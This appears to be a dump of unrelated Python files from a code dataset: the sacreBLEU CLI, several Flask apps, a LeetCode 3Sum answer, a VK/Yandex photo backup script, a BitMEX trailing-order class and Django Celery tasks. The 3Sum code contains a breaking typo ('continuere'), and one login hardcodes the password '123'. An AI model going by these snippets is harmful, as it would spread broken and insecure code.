return compute_bleu(correct, total, sys_len, ref_len, smooth_method=smooth_method, smooth_value=smooth_value, use_effective_order=use_effective_order)
def raw_corpus_bleu(sys_stream,
ref_streams,
smooth_value=None) -> BLEU:
"""Convenience function that wraps corpus_bleu().
This is convenient if you're using sacrebleu as a library, say for scoring on dev.
It uses no tokenization and 'floor' smoothing, with the floor default to 0 (no smoothing).
:param sys_stream: the system stream (a sequence of segments)
:param ref_streams: a list of one or more reference streams (each a sequence of segments)
"""
return corpus_bleu(sys_stream, ref_streams, smooth_method='floor', smooth_value=smooth_value, force=True, tokenize='none', use_effective_order=True)
def delete_whitespace(text: str) -> str:
"""
Removes whitespaces from text.
"""
return re.sub(r'\s+', '', text).strip()
def get_sentence_statistics(hypothesis: str,
reference: str,
order: int = CHRF_ORDER,
remove_whitespace: bool = True) -> List[float]:
hypothesis = delete_whitespace(hypothesis) if remove_whitespace else hypothesis
reference = delete_whitespace(reference) if remove_whitespace else reference
statistics = [0] * (order * 3)
for i in range(order):
n = i + 1
hypothesis_ngrams = extract_char_ngrams(hypothesis, n)
reference_ngrams = extract_char_ngrams(reference, n)
common_ngrams = hypothesis_ngrams & reference_ngrams
statistics[3 * i + 0] = sum(hypothesis_ngrams.values())
statistics[3 * i + 1] = sum(reference_ngrams.values())
statistics[3 * i + 2] = sum(common_ngrams.values())
return statistics
def get_corpus_statistics(hypotheses: Iterable[str],
references: Iterable[str],
order: int = CHRF_ORDER,
remove_whitespace: bool = True) -> List[float]:
corpus_statistics = [0] * (order * 3)
for hypothesis, reference in zip(hypotheses, references):
statistics = get_sentence_statistics(hypothesis, reference, order=order, remove_whitespace=remove_whitespace)
for i in range(len(statistics)):
corpus_statistics[i] += statistics[i]
return corpus_statistics
def _avg_precision_and_recall(statistics: List[float], order: int) -> Tuple[float, float]:
avg_precision = 0.0
avg_recall = 0.0
effective_order = 0
for i in range(order):
hypotheses_ngrams = statistics[3 * i + 0]
references_ngrams = statistics[3 * i + 1]
common_ngrams = statistics[3 * i + 2]
if hypotheses_ngrams > 0 and references_ngrams > 0:
avg_precision += common_ngrams / hypotheses_ngrams
avg_recall += common_ngrams / references_ngrams
effective_order += 1
if effective_order == 0:
return 0.0, 0.0
avg_precision /= effective_order
avg_recall /= effective_order
return avg_precision, avg_recall
def _chrf(avg_precision, avg_recall, beta: int = CHRF_BETA) -> float:
if avg_precision + avg_recall == 0:
return 0.0
beta_square = beta ** 2
score = (1 + beta_square) * (avg_precision * avg_recall) / ((beta_square * avg_precision) + avg_recall)
return score
def corpus_chrf(hypotheses: Iterable[str],
references: Iterable[str],
order: int = CHRF_ORDER,
beta: float = CHRF_BETA,
remove_whitespace: bool = True) -> CHRF:
"""
Computes Chrf on a corpus.
:param hypotheses: Stream of hypotheses.
:param references: Stream of references
:param order: Maximum n-gram order.
:param remove_whitespace: Whether to delete all whitespace from hypothesis and reference strings.
:param beta: Defines importance of recall w.r.t precision. If beta=1, same importance.
:return: Chrf score.
"""
corpus_statistics = get_corpus_statistics(hypotheses, references, order=order, remove_whitespace=remove_whitespace)
avg_precision, avg_recall = _avg_precision_and_recall(corpus_statistics, order)
return CHRF(_chrf(avg_precision, avg_recall, beta=beta))
def sentence_chrf(hypothesis: str,
reference: str,
order: int = CHRF_ORDER,
beta: float = CHRF_BETA,
remove_whitespace: bool = True) -> CHRF:
"""
Computes ChrF on a single sentence pair.
:param hypothesis: Hypothesis string.
:param reference: Reference string.
:param order: Maximum n-gram order.
:param remove_whitespace: Whether to delete whitespaces from hypothesis and reference strings.
:param beta: Defines importance of recall w.r.t precision. If beta=1, same importance.
:return: Chrf score.
"""
statistics = get_sentence_statistics(hypothesis, reference, order=order, remove_whitespace=remove_whitespace)
avg_precision, avg_recall = _avg_precision_and_recall(statistics, order)
return CHRF(_chrf(avg_precision, avg_recall, beta=beta))
def get_langpairs_for_testset(testset: str) -> List:
"""Return a list of language pairs for a given test set."""
return list(filter(lambda x: re.match('\w\w\-\w\w', x), DATASETS.get(testset, {}).keys()))
def get_a_list_of_testset_names() -> str:
"""Return a string with a formatted list of available test sets plus their descriptions. """
message = 'The available test sets are:'
for testset in sorted(DATASETS.keys(), reverse=True):
message += '\n%20s: %s' % (testset, DATASETS[testset].get('description', ''))
return message
def _available_origlangs(test_sets, langpair):
"""Return a list of origlang values in according to the raw SGM files."""
origlangs = set()
for test_set in test_sets.split(','):
rawfile = os.path.join(SACREBLEU_DIR, test_set, 'raw', DATASETS[test_set][langpair][0])
if rawfile.endswith('.sgm'):
with smart_open(rawfile) as fin:
for line in fin:
if line.startswith('<doc '):
doc_origlang = re.sub(r'.* origlang="([^"]+)".*\n', '\\1', line)
origlangs.add(doc_origlang)
return sorted(list(origlangs))
def _filter_subset(systems, test_sets, langpair, origlang, subset=None):
"""Filter sentences with a given origlang (or subset) according to the raw SGM files."""
if origlang is None and subset is None:
return systems
if test_sets is None or langpair is None:
raise ValueError('Filtering for --origlang or --subset needs a test (-t) and a language pair (-l).')
indices_to_keep = []
for test_set in test_sets.split(','):
rawfile = os.path.join(SACREBLEU_DIR, test_set, 'raw', DATASETS[test_set][langpair][0])
if not rawfile.endswith('.sgm'):
raise Exception('--origlang and --subset supports only *.sgm files, not %s', rawfile)
if subset is not None:
if test_set not in SUBSETS:
raise Exception('No subset annotation available for test set ' + test_set)
doc_to_tags = SUBSETS[test_set]
number_sentences_included = 0
with smart_open(rawfile) as fin:
include_doc = False
for line in fin:
if line.startswith('<doc '):
if origlang is None:
include_doc = True
else:
doc_origlang = re.sub(r'.* origlang="([^"]+)".*\n', '\\1', line)
if origlang.startswith('non-'):
include_doc = doc_origlang != origlang[4:]
else:
include_doc = doc_origlang == origlang
if subset is not None:
doc_id = re.sub(r'.* docid="([^"]+)".*\n', '\\1', line)
if not re.search(subset, doc_to_tags.get(doc_id, '')):
include_doc = False
if line.startswith('<seg '):
indices_to_keep.append(include_doc)
number_sentences_included += 1 if include_doc else 0
return [[sentence for sentence,keep in zip(sys, indices_to_keep) if keep] for sys in systems]
def main():
args = parse_args()
# Explicitly set the encoding
sys.stdin = open(sys.stdin.fileno(), mode='r', encoding='utf-8', buffering=True, newline="\n")
sys.stdout = open(sys.stdout.fileno(), mode='w', encoding='utf-8', buffering=True)
if not args.quiet:
logging.basicConfig(level=logging.INFO, format='sacreBLEU: %(message)s')
if args.download:
download_test_set(args.download, args.langpair)
sys.exit(0)
if args.list:
if args.test_set:
print(' '.join(get_langpairs_for_testset(args.test_set)))
else:
print(get_a_list_of_testset_names())
sys.exit(0)
if args.sentence_level and len(args.metrics) > 1:
sacrelogger.error('Only one metric can be used with Sentence-level reporting.')
sys.exit(1)
if args.citation:
if not args.test_set:
sacrelogger.error('I need a test set (-t).')
sys.exit(1)
for test_set in args.test_set.split(','):
if 'citation' not in DATASETS[test_set]:
sacrelogger.error('No citation found for %s', test_set)
else:
print(DATASETS[test_set]['citation'])
sys.exit(0)
if args.num_refs != 1 and (args.test_set is not None or len(args.refs) > 1):
sacrelogger.error('The --num-refs argument allows you to provide any number of tab-delimited references in a single file.')
sacrelogger.error('You can only use it with externaly-provided references, however (i.e., not with `-t`),')
sacrelogger.error('and you cannot then provide multiple reference files.')
sys.exit(1)
if args.test_set is not None:
for test_set in args.test_set.split(','):
if test_set not in DATASETS:
sacrelogger.error('Unknown test set "%s"\n%s', test_set, get_a_list_of_testset_names())
sys.exit(1)
if args.test_set is None:
if len(args.refs) == 0:
sacrelogger.error('I need either a predefined test set (-t) or a list of references')
sacrelogger.error(get_a_list_of_testset_names())
sys.exit(1)
elif len(args.refs) > 0:
sacrelogger.error('I need exactly one of (a) a predefined test set (-t) or (b) a list of references')
sys.exit(1)
elif args.langpair is None:
sacrelogger.error('I need a language pair (-l).')
sys.exit(1)
else:
for test_set in args.test_set.split(','):
if args.langpair not in DATASETS[test_set]:
sacrelogger.error('No such language pair "%s"', args.langpair)
sacrelogger.error('Available language pairs for test set "%s": %s', test_set,
', '.join(x for x in DATASETS[test_set].keys() if '-' in x))
sys.exit(1)
if args.echo:
if args.langpair is None or args.test_set is None:
sacrelogger.warning("--echo requires a test set (--t) and a language pair (-l)")
sys.exit(1)
for test_set in args.test_set.split(','):
print_test_set(test_set, args.langpair, args.echo, args.origlang, args.subset)
sys.exit(0)
if args.test_set is not None and args.tokenize == 'none':
sacrelogger.warning("You are turning off sacrebleu's internal tokenization ('--tokenize none'), presumably to supply\n"
"your own reference tokenization. Published numbers will not be comparable with other papers.\n")
# Internal tokenizer settings. Set to 'zh' for Chinese DEFAULT_TOKENIZER (
if args.tokenize is None:
# set default
if args.langpair is not None and args.langpair.split('-')[1] == 'zh':
args.tokenize = 'zh'
elif args.langpair is not None and args.langpair.split('-')[1] == 'ja':
args.tokenize = 'ja-mecab'
else:
args.tokenize = DEFAULT_TOKENIZER
if args.langpair is not None and 'bleu' in args.metrics:
if args.langpair.split('-')[1] == 'zh' and args.tokenize != 'zh':
logger.warning('You should also pass "--tok zh" when scoring Chinese...')
if args.langpair.split('-')[1] == 'ja' and not args.tokenize.startswith('ja-'):
logger.warning('You should also pass "--tok ja-mecab" when scoring Japanese...')
# concat_ref_files is a list of list of reference filenames, for example:
# concat_ref_files = [[testset1_refA, testset1_refB], [testset2_refA, testset2_refB]]
if args.test_set is None:
concat_ref_files = [args.refs]
else:
concat_ref_files = []
for test_set in args.test_set.split(','):
_, *ref_files = download_test_set(test_set, args.langpair)
if len(ref_files) == 0:
sacrelogger.warning('No references found for test set {}/{}.'.format(test_set, args.langpair))
concat_ref_files.append(ref_files)
inputfh = io.TextIOWrapper(sys.stdin.buffer, encoding=args.encoding) if args.input == '-' else smart_open(args.input, encoding=args.encoding)
full_system = inputfh.readlines()
# Read references
full_refs = [[] for x in range(max(len(concat_ref_files[0]), args.num_refs))]
for ref_files in concat_ref_files:
for refno, ref_file in enumerate(ref_files):
for lineno, line in enumerate(smart_open(ref_file, encoding=args.encoding), 1):
if args.num_refs != 1:
splits = line.rstrip().split(sep='\t', maxsplit=args.num_refs-1)
if len(splits) != args.num_refs:
sacrelogger.error('FATAL: line {}: expected {} fields, but found {}.'.format(lineno, args.num_refs, len(splits)))
sys.exit(17)
for refno, split in enumerate(splits):
full_refs[refno].append(split)
else:
full_refs[refno].append(line)
# Filter sentences according to a given origlang
system, *refs = _filter_subset([full_system, *full_refs], args.test_set, args.langpair, args.origlang, args.subset)
if len(system) == 0:
message = 'Test set %s contains no sentence' % args.test_set
if args.origlang is not None or args.subset is not None:
message += ' with'
message += '' if args.origlang is None else ' origlang=' + args.origlang
message += '' if args.subset is None else ' subset=' + args.subset
sacrelogger.error(message)
exit(1)
# Handle sentence level and quit
if args.sentence_level:
for output, *references in zip(system, *refs):
results = []
for metric in args.metrics:
if metric == 'bleu':
bleu = sentence_bleu(output,
[[x] for x in references],
smooth_method=args.smooth,
smooth_value=args.smooth_value)
results.append(bleu)
if metric == 'chrf':
chrf = sentence_chrf(output,
references[0],
args.chrf_order,
args.chrf_beta,
remove_whitespace=not args.chrf_whitespace)
results.append(chrf)
display_metric(args.metrics, results, len(refs), args)
sys.exit(0)
# Else, handle system level
results = []
try:
for metric in args.metrics:
if metric == 'bleu':
bleu = corpus_bleu(system, refs, smooth_method=args.smooth, smooth_value=args.smooth_value, force=args.force, lowercase=args.lc, tokenize=args.tokenize)
results.append(bleu)
elif metric == 'chrf':
chrf = corpus_chrf(system, refs[0], beta=args.chrf_beta, order=args.chrf_order, remove_whitespace=not args.chrf_whitespace)
results.append(chrf)
except EOFError:
sacrelogger.error('The input and reference stream(s) were of different lengths.')
if args.test_set is not None:
sacrelogger.error('\nThis could be a problem with your system output or with sacreBLEU\'s reference database.\n'
'If the latter, you can clean out the references cache by typing:\n'
'\n'
' rm -r %s/%s\n'
'\n'
'They will be downloaded automatically again the next time you run sacreBLEU.', SACREBLEU_DIR,
args.test_set)
sys.exit(1)
display_metric(args.metrics, results, len(refs), args)
if args.detail:
width = args.width
sents_digits = len(str(len(full_system)))
origlangs = args.origlang if args.origlang else _available_origlangs(args.test_set, args.langpair)
for origlang in origlangs:
subsets = [None]
if args.subset is not None:
subsets += [args.subset]
elif all(t in SUBSETS for t in args.test_set.split(',')):
subsets += COUNTRIES + DOMAINS
for subset in subsets:
system, *refs = _filter_subset([full_system, *full_refs], args.test_set, args.langpair, origlang, subset)
if len(system) == 0:
continue
if subset in COUNTRIES:
subset_str = '%20s' % ('country=' + subset)
elif subset in DOMAINS:
subset_str = '%20s' % ('domain=' + subset)
else:
subset_str = '%20s' % ''
if 'bleu' in args.metrics:
bleu = corpus_bleu(system, refs, smooth_method=args.smooth, smooth_value=args.smooth_value, force=args.force, lowercase=args.lc, tokenize=args.tokenize)
print('origlang={} {}: sentences={:{}} BLEU={:{}.{}f}'.format(origlang, subset_str, len(system), sents_digits, bleu.score, width+4, width))
if 'chrf' in args.metrics:
chrf = corpus_chrf(system, refs[0], beta=args.chrf_beta, order=args.chrf_order, remove_whitespace=not args.chrf_whitespace)
print('origlang={} {}: sentences={:{}} chrF={:{}.{}f}'.format(origlang, subset_str, len(system), sents_digits, chrf.score, width+4, width))
def display_metric(metrics_to_print, results, num_refs, args):
"""
Badly in need of refactoring.
One idea is to put all of this in the BLEU and CHRF classes, and then define
a Result::signature() function.
"""
for metric, result in zip(metrics_to_print, results):
if metric == 'bleu':
if args.score_only:
print('{0:.{1}f}'.format(result.score, args.width))
else:
version_str = bleu_signature(args, num_refs)
print(result.format(args.width).replace('BLEU', 'BLEU+' + version_str))
elif metric == 'chrf':
if args.score_only:
print('{0:.{1}f}'.format(result.score, args.width))
else:
version_str = chrf_signature(args, num_refs)
print('chrF{0:d}+{1} = {2:.{3}f}'.format(args.chrf_beta, version_str, result.score, args.width))
def parse_args():
arg_parser = argparse.ArgumentParser(
description='sacreBLEU: Hassle-free computation of shareable BLEU scores.\n'
'Quick usage: score your detokenized output against WMT\'14 EN-DE:\n'
' cat output.detok.de | sacrebleu -t wmt14 -l en-de',
# epilog = 'Available test sets: ' + ','.join(sorted(DATASETS.keys(), reverse=True)),
formatter_class=argparse.RawDescriptionHelpFormatter)
arg_parser.add_argument('--test-set', '-t', type=str, default=None,
help='the test set to use (see also --list) or a comma-separated list of test sets to be concatenated')
arg_parser.add_argument('-lc', action='store_true', default=False,
help='Use case-insensitive BLEU (default: actual case)')
arg_parser.add_argument('--sentence-level', '-sl', action='store_true',
help='Output metric on each sentence.')
arg_parser.add_argument('--smooth', '-s', choices=['exp', 'floor', 'add-k', 'none'],
default='exp',
help='smoothing method: exponential decay (default), floor (increment zero counts), add-k (increment num/denom by k for n>1), or none')
arg_parser.add_argument('--smooth-value', '-sv', type=float, default=None,
help='The value to pass to the smoothing technique, only used for floor and add-k. Default floor: {}, add-k: {}.'.format(
SMOOTH_VALUE_DEFAULT['floor'], SMOOTH_VALUE_DEFAULT['add-k']))
arg_parser.add_argument('--tokenize', '-tok', choices=TOKENIZERS.keys(), default=None,
help='tokenization method to use')
arg_parser.add_argument('--language-pair', '-l', dest='langpair', default=None,
help='source-target language pair (2-char ISO639-1 codes)')
arg_parser.add_argument('--origlang', '-ol', dest='origlang', default=None,
help='use a subset of sentences with a given original language (2-char ISO639-1 codes), "non-" prefix means negation')
arg_parser.add_argument('--subset', dest='subset', default=None,
help='use a subset of sentences whose document annotation matches a give regex (see SUBSETS in the source code)')
arg_parser.add_argument('--download', type=str, default=None,
help='download a test set and quit')
arg_parser.add_argument('--echo', choices=['src', 'ref', 'both'], type=str, default=None,
help='output the source (src), reference (ref), or both (both, pasted) to STDOUT and quit')
arg_parser.add_argument('--input', '-i', type=str, default='-',
help='Read input from a file instead of STDIN')
arg_parser.add_argument('--num-refs', '-nr', type=int, default=1,
help='Split the reference stream on tabs, and expect this many references. Default: %(default)s.')
arg_parser.add_argument('refs', nargs='*', default=[],
help='optional list of references (for backwards-compatibility with older scripts)')
arg_parser.add_argument('--metrics', '-m', choices=['bleu', 'chrf'], nargs='+',
default=['bleu'],
help='metrics to compute (default: bleu)')
arg_parser.add_argument('--chrf-order', type=int, default=CHRF_ORDER,
help='chrf character order (default: %(default)s)')
arg_parser.add_argument('--chrf-beta', type=int, default=CHRF_BETA,
help='chrf BETA parameter (default: %(default)s)')
arg_parser.add_argument('--chrf-whitespace', action='store_true', default=False,
help='include whitespace in chrF calculation (default: %(default)s)')
arg_parser.add_argument('--short', default=False, action='store_true',
help='produce a shorter (less human readable) signature')
arg_parser.add_argument('--score-only', '-b', default=False, action='store_true',
help='output only the BLEU score')
arg_parser.add_argument('--force', default=False, action='store_true',
help='insist that your tokenized input is actually detokenized')
arg_parser.add_argument('--quiet', '-q', default=False, action='store_true',
help='suppress informative output')
arg_parser.add_argument('--encoding', '-e', type=str, default='utf-8',
help='open text files with specified encoding (default: %(default)s)')
arg_parser.add_argument('--list', default=False, action='store_true',
help='print a list of all available test sets.')
arg_parser.add_argument('--citation', '--cite', default=False, action='store_true',
help='dump the bibtex citation and quit.')
arg_parser.add_argument('--width', '-w', type=int, default=1,
help='floating point width (default: %(default)s)')
arg_parser.add_argument('--detail', '-d', default=False, action='store_true',
help='print extra information (split test sets based on origlang)')
arg_parser.add_argument('-V', '--version', action='version',
version='%(prog)s {}'.format(VERSION))
args = arg_parser.parse_args()
return args
if __name__ == '__main__':
main()
|
9,576 | 763e2db4eb9ad5953273fb310c8e9714964a39e6 | from flask import Blueprint, request, render_template, session, redirect
log = Blueprint('login', __name__, )
@log.route('/login', methods=['GET', 'POST'])
def login():
print(request.path, )
if request.method == 'GET':
return render_template('exec/login.html')
else:
username = request.form.get('username')
password = request.form.get('password')
if username == 'henry' and password == '123':
session['username'] = 'henry'
return redirect('/detail')
return 'Failed'
|
9,577 | 759b440bf436afbfb081cf55eeb4a0f075ed3e6d | ulang = 'y'
while True :
a = int(input ("masukkan nilai = "))
if a > 60 :
status = "LULUS"
elif a <= 60 :
status = "TIDAK LULUS"
print(status)
ulang = input("apakah anda ingin mengulang? y/n = ") |
9,578 | 5616ec135a2233e742ff3b2b1f378ec12298b935 | from flask_restful import Resource, reqparse
import sqlite3
from flask_jwt import jwt_required
from models.item_model import ItemModel
from flask_sqlalchemy import SQLAlchemy
from d import db
from models.store_model import StoreModel
class Modell(Resource):
def get(self, name):
item = StoreModel.find_by_name(name)
return item.json()
def post(self, name):
if StoreModel.find_by_name(name):
return {"message": "sorry no store available in this name"}
#data = Modell.requested.parse_args()
item = StoreModel(name)
item.save_to_db()
return item.json()
def put(self, name):
# data = Modell.requested.parse_args()
item = StoreModel.find_by_name(name)
item.save_to_db()
return item.json()
def delete(self, name):
item=StoreModel.find_by_name(name)
if item:
item.delete_from_db()
return {"m":"delted successfully"}
class Storelist(Resource):
def get(self):
return {"item":[x for x in StoreModel.query.all()]} |
9,579 | d806d1b31712e3d8d60f4bfbc60c6939dfeeb357 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 16 20:47:28 2019
@author: jaco
"""
|
9,580 | ccf3ada9a2bedf29820170f2e8184fc16f1b7aea | #
# @lc app=leetcode.cn id=15 lang=python3
#
# [15] 三数之和
#
# https://leetcode-cn.com/problems/3sum/description/
#
# algorithms
# Medium (25.76%)
# Likes: 1904
# Dislikes: 0
# Total Accepted: 176.6K
# Total Submissions: 679K
# Testcase Example: '[-1,0,1,2,-1,-4]'
#
# 给你一个包含 n 个整数的数组 nums,判断 nums 中是否存在三个元素 a,b,c ,使得 a + b + c = 0
# ?请你找出所有满足条件且不重复的三元组。
#
# 注意:答案中不可以包含重复的三元组。
#
#
#
# 示例:
#
# 给定数组 nums = [-1, 0, 1, 2, -1, -4],
#
# 满足要求的三元组集合为:
# [
# [-1, 0, 1],
# [-1, -1, 2]
# ]
#
# 1. 三层循环暴力求解
# 2. 双指针求解
# 3. hashmap 求解
# @lc code=start
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
res = []
nums.sort()
for k in range(len(nums) - 2):
if k > 0 and nums[k] == nums[k-1]:
continuere
if nums[k] > 0:
break
L, R = k+1, len(nums) - 1
while L < R:
s = nums[k] + nums[L] + nums[R]
if s < 0:
L += 1
elif s > 0:
R -= 1
else:
res.append((nums[k], nums[L], nums[R]))
while L < R and nums[L] == nums[L+1]:
L += 1
while L < R and nums[R] == nums[R-1]:
R -= 1
L += 1
R -= 1
return res
# @lc code=end
|
9,581 | a22bc3bdb5e35060eff7f523b90d605ff2dd3878 | import requests
import datetime
import time
from tqdm import tqdm
import json
import logging
logging.basicConfig(filename='logo.log', level=logging.DEBUG, filemode='w')
logging.debug('debug message')
logging.info('info message')
# from pprint import pprint
id_vk = input('введите id пользователя вк: ')
token_vk = input('введите токен вк: ')
url = 'https://api.vk.com/method/photos.get'
params = {'user_id': id_vk, 'access_token': token_vk, 'v': '5.131','album_id': 'profile', 'extended': '1', 'photo_sizes': '1'}
res = requests.get(url, params=params)
# pprint(res.json())
token_ya = input('введите токен Yandex: ')
def ya_headers():
return {'Content-type': 'application/json', 'Authorization': 'OAuth {}'.format(token_ya)}
def put_folder(path):
url = 'https://cloud-api.yandex.net/v1/disk/resources/'
headers = ya_headers()
params = {'path': path, 'url': url}
response = requests.put(url,headers = headers, params = params)
if response.status_code == 201:
print('папка создана')
elif response.status_code == 409:
print('Папка уже существует. Файлы будут помещены в неё.')
return path
def post_file(file_url, file_name):
upload_url = 'https://cloud-api.yandex.net/v1/disk/resources/upload'
headers = ya_headers()
params = {'path': f'/{file_name}', 'url': file_url}
response = requests.post(upload_url, headers = headers, params = params)
return response.json()
folder_name = put_folder(input("введите имя папки для загрузки фотографий: "))
name_list = []
data = []
size_list = []
for photos in tqdm(res.json()['response']['items']):
sizes = photos['sizes']
for picture in sizes:
size_list.append(picture['type'])
size_list.sort(reverse=True)
for picture1 in sizes:
data_dict = {}
if picture1['type'] == size_list[0]:
href = picture1['url']
filename = photos['likes']['count']
if filename in name_list:
filename = f"{photos['likes']['count']}+{datetime.datetime.fromtimestamp(photos['date']).isoformat().replace(':', '|')}"
post_file(href, f"{folder_name}/{filename}")
else:
post_file(href, f"{folder_name}/{filename}")
data_dict['file_name'] = filename
data_dict['size'] = picture1['type']
data.append(data_dict)
name_list.append(filename)
size_list.clear()
time.sleep(1)
with open ('foto.json', 'w') as f:
json.dump(data, f, ensure_ascii=False, indent=2) |
9,582 | ea4ec2e605ab6e8734f7631fe298c93467908b5f | import json
import decimal
import threading
import websocket
from time import sleep
from supervisor.core.utils.math import to_nearest
def find_item_by_keys(keys, table, match_data):
for item in table:
matched = True
for key in keys:
if item[key] != match_data[key]:
matched = False
if matched:
return item
class TrailingShell:
# Don't grow a table larger than this amount. Helps cap memory usage.
MAX_TABLE_LEN = 200
def __init__(self, order, offset: int, tick_size: float, test=True, init_ws=True):
self.tick_size = tick_size
self.exited = False
self.test = test
self.order = order
self.offset = offset
self.last_price = 0
self._min_price = float('inf')
self._max_price = -1
self.initial_price = float('nan')
self.tracking = False
self.ws = None
self.__reset()
if init_ws:
self.connect()
def __del__(self):
self.exit()
def exit(self):
self.exited = True
if self.ws is not None:
self.ws.close()
def __reset(self):
self.data = {}
self.keys = {}
self.exited = False
self._error = None
def get_instrument(self, symbol):
instruments = self.data.get('instrument', None)
if instruments is None:
return None
matching_instruments = [i for i in instruments if i['symbol'] == symbol]
if len(matching_instruments) == 0:
raise Exception("Unable to find instrument or index with symbol: " + symbol)
instrument = matching_instruments[0]
# Turn the 'tickSize' into 'tickLog' for use in rounding
# http://stackoverflow.com/a/6190291/832202
instrument['tickLog'] = decimal.Decimal(str(instrument['tickSize'])).as_tuple().exponent * -1
return instrument
def calculate_new_price(self, extremum) -> float:
if self.order.side == 'Sell':
needed_price = extremum * (1 - self.offset / 100)
else:
needed_price = extremum * (1 + self.offset / 100)
needed_price = to_nearest(needed_price, tickSize=self.tick_size)
return needed_price
@property
def min_price(self):
return self._min_price
@min_price.setter
def min_price(self, value):
if value < self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._min_price = value
@property
def max_price(self):
return self._max_price
@max_price.setter
def max_price(self, value):
if value > self.initial_price:
new_price = self.calculate_new_price(value)
self.order.move(to=new_price)
self._max_price = value
def stop_trailing(self):
self.tracking = False
def start_trailing(self, initial_price: float):
"""
:param initial_price: the price after reaching which order will be moving
"""
self._max_price = -1
self._min_price = float('inf')
self.initial_price = initial_price
self.tracking = True
def connect(self):
"""Connect to the websocket and initialize data stores."""
symbol = self.order.symbol
if self.test:
host = 'wss://testnet.bitmex.com/realtime'
else:
host = 'wss://bitmex.com/realtime'
# Get WS URL and connect.
endpoint = f"realtime?subscribe=instrument:{symbol}"
ws_url = host + endpoint
self.__connect(ws_url)
# Connected. Wait for partials
self.__wait_for_symbol()
def __connect(self, ws_url):
self.ws = websocket.WebSocketApp(ws_url,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error,
header=[])
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
# Wait for connect before continuing
conn_timeout = 5
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout and not self._error:
sleep(1)
conn_timeout -= 1
if not conn_timeout or self._error:
self.exit()
def __wait_for_symbol(self):
while not {'instrument'} <= set(self.data):
sleep(0.1)
def __on_message(self, message):
"""Handler for parsing WS messages."""
message = json.loads(message)
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
if 'subscribe' in message:
if not message['success']:
self.error("Unable to subscribe to %s. Error: \"%s\" Please check and restart." %
(message['request']['args'][0], message['error']))
elif 'status' in message:
if message['status'] == 400:
self.error(message['error'])
if message['status'] == 401:
self.error("API Key incorrect, please check and restart.")
elif action:
if table not in self.data:
self.data[table] = []
if table not in self.keys:
self.keys[table] = []
# There are four possible actions from the WS:
# 'partial' - full table image
# 'insert' - new row
# 'update' - update row
# 'delete' - delete row
if action == 'partial':
self.data[table] += message['data']
# Keys are communicated on partials to let you know how to uniquely identify
# an item. We use it for updates.
self.keys[table] = message['keys']
elif action == 'insert':
self.data[table] += message['data']
# Limit the max length of the table to avoid excessive memory usage.
# Don't trim orders because we'll lose valuable state if we do.
if table not in ['order', 'orderBookL2'] and len(self.data[table]) > TrailingShell.MAX_TABLE_LEN:
self.data[table] = self.data[table][(TrailingShell.MAX_TABLE_LEN // 2):]
elif action == 'update':
# Locate the item in the collection and update it.
for updateData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], updateData)
if not item:
continue # No item found to update. Could happen before push
# Update this item.
item.update(updateData)
# Remove canceled / filled orders
# if table == 'order' and item['leavesQty'] <= 0:
# self.data[table].remove(item)
elif action == 'delete':
# Locate the item in the collection and remove it.
for deleteData in message['data']:
item = find_item_by_keys(self.keys[table], self.data[table], deleteData)
self.data[table].remove(item)
else:
raise Exception("Unknown action: %s" % action)
instrument = self.get_instrument(symbol=self.order.symbol)
if instrument is not None:
self.last_price = instrument['lastPrice']
if self.tracking:
if self.last_price > self.max_price and self.order.side == 'Sell':
self.max_price = self.last_price
elif self.last_price < self.min_price and self.order.side == 'Buy':
self.min_price = self.last_price
def __on_close(self):
self.exit()
def __on_open(self):
pass
def __on_error(self, error):
if not self.exited:
self.error(error)
def error(self, err):
self.exit()
|
9,583 | c7037b6a576374f211580b304f8447349bbbbea3 | #!/usr/bin/python
# -*- coding: latin-1 -*-
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html', titre="Ludovic DELSOL - Portfolio")
@app.route('/etude')
def etude():
return render_template('etude.html', titre="Portfolio Ludovic DELSOL - Etude")
@app.route('/experience')
def experience():
return render_template('experience.html', titre="Portfolio Ludovic DELSOL - Experiences Pros")
@app.route('/competence')
def compentence():
return render_template('compentence.html', titre="Portfolio Ludovic DELSOL - Compétences")
@app.route('/projet')
def project():
return render_template('projet.html', titre="Portfolio Ludovic DELSOL - Projets")
if __name__ == '__main__':
app.run(debug=True)
|
9,584 | 7f7d087b7001cd7df01d4f22e056809be5a35568 | # 使用celery
from django.conf import settings
from django.core.mail import send_mail
from django.template import loader,RequestContext
from celery import Celery
import time
# 在任务处理者一
#
# 端加的代码
import os
import django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dailyfresh.settings")
django.setup()
from goods.models import GoodsType, IndexGoodsBanner, IndexPromotionBanner, IndexTypeGoodsBanner
# 创建一个实例对象
app = Celery('celery_tasks.tasks', broker='redis://127.0.0.1:6379/8')
# 定义任务函数,发邮件函数
@app.task
def send_register_active_email(to_email, username, token):
'''发送激活邮件'''
# 组织邮件信息
subject = '天天生鲜欢迎信息'
message = ''
sender = settings.EMAIL_FROM
receiver = [to_email]
html_message = '<h1>%s,欢迎</h1><br>请点击以下链接激活<br><a href="http://127.0.0.1:8000/user/active/%s">http://127.0.0.1:8000/user/active/%s</a>'%(username, token, token)
send_mail(subject, message, sender, receiver, html_message=html_message)
@app.task
def generate_static_index_html():
'''产生首页静态页面'''
types = GoodsType.objects.all()
# 获取首页轮播图信息
goods_banners = IndexGoodsBanner.objects.all().order_by('index')
# 获取首页促销信息
promotion_banners = IndexPromotionBanner.objects.all().order_by('index')
# 获取首页分类商品展示信息
#type_goods_banners = IndexTypeGoodsBanner.objects.all()
for type in types:
# 获取type种类首页分类商品图片信息
image_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=1).order_by('index')
# 获取type种类首页分类商品的文字展示信息
title_banners = IndexTypeGoodsBanner.objects.filter(type=type, display_type=0).order_by('index')
# 将查出来的数据动态添加到type中
type.image_banners = image_banners
type.title_banners = title_banners
# 获取用户购物车中商品信息
# 组织模范上下文
context = {'types': types,
'goods_banners': goods_banners,
'promotion_banners': promotion_banners}
# 加载模板文件
temp = loader.get_template('static_index.html')
